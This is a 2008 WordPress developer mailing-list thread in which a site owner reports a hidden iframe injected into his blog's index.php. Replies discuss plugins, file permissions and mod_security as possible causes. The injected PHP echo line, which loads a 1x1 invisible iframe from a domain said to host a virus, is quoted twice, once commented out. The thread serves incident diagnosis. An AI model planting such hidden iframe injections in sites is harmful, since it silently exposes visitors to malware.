[wp-hackers] Re: XSS vuln in wordpress 2.7 ?

baker god.dreams at gmail.com
Mon Dec 22 19:26:31 GMT 2008


Just to chime in on the fun, you're not the only one as a quick google
search pulls a lot of people with similar posts.

http://www.networksolutions.com/whois-search/thedeadpit.com

As well shows the (supposed) owner is in Estonia, which oddly enough
I've seen a lot of failed hack attempts on my site coming from Estonia
(I think, maybe it was algeria?)

Do you have mod_security enabled? No luck on pulling down the
offender's IP, and the site itself seems to do nothing but host a
virus...

Best of luck turning this around...

-kb

> ------------------------------
>
> Message: 7
> Date: Mon, 22 Dec 2008 20:39:49 +0200
> From: madalin <niladam at gmail.com>
> Subject: Re: [wp-hackers] XSS vuln in wordpress 2.7 ?
> To: wp-hackers at lists.automattic.com
> Message-ID:
>        <df809b110812221039y29f116f1k5238dfb209d3f30a at mail.gmail.com>
> Content-Type: text/plain; charset=UTF-8
>
> Yes that's exactly what i am saying. Here is my index.php:
>
> <?php
> /**
>  * Front to the WordPress application. This file doesn't do anything, but loads
>  * wp-blog-header.php which does and tells WordPress to load the theme.
>  *
>  * @package WordPress
>  */
>
> /**
>  * Tells WordPress to load the WordPress theme and output it.
>  *
>  * @var bool
>  */
> define('WP_USE_THEMES', true);
>
> /** Loads the WordPress Environment and Template */
> require('./wp-blog-header.php');
>
> // echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
> ?>
>
>
>
> I've commented the line so i can keep it for future investigations.
>
> Our password have NOT been compromised as the only logins are from my
> host and my friend's host. It could be an older version of a plugin
> tough.
>
> However, i had to report this as maybe someone will encounter the same
> problem or so.
>
> Thanks.
>
> On Mon, Dec 22, 2008 at 8:36 PM, Stephen Rider
> <wp-hackers at striderweb.com> wrote:
>> Well, wait.  he said:  "i found [it in] my blog's index.php (not theme's
>> index.php)"
>>
>> Does this mean it shows up in the final rendered page, but not in the
>> theme's file?  In that case, it's being added dynamically.  The link is not
>> written in the theme.
>>
>> Just trying to clarify.  I'm no security guru... (IANASG)
>>
>> Stephen
>>
>> On Dec 22, 2008, at 11:33 AM, Joost de Valk wrote:
>>
>>> If the file is writable for the webserver and file access is enabled on
>>> the webserver: yes.
>>
>>> On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:
>>>
>>>> Wow. That's nasty, and malicious. Could a plugin do that?
>>>>
>>>> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>>>>
>>>>> For some reason i found my blog's index.php (not theme's index.php)
>>>>> with the following piece of code right before the ?>
>>>>>
>>>>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
>>>>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>>>>
>>>>> I tried looking at the logs. No luck. The file's permisions look like
>>>>> this:
>>>>>
>>>>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50
>>>>> /home/madalin/www/index.php
>>
>> _______________________________________________
>> wp-hackers mailing list
>> wp-hackers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>>
>
>
> ------------------------------
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>
>
> End of wp-hackers Digest, Vol 47, Issue 66
> ******************************************
>



-- 
Keith Baker
grand central: (614) 654-4296
linkedin: http://www.linkedin.com/in/keithbaker
twitter: http:/www.twitter.com/ikeif
blog: http://ikeif.net


More information about the wp-hackers mailing list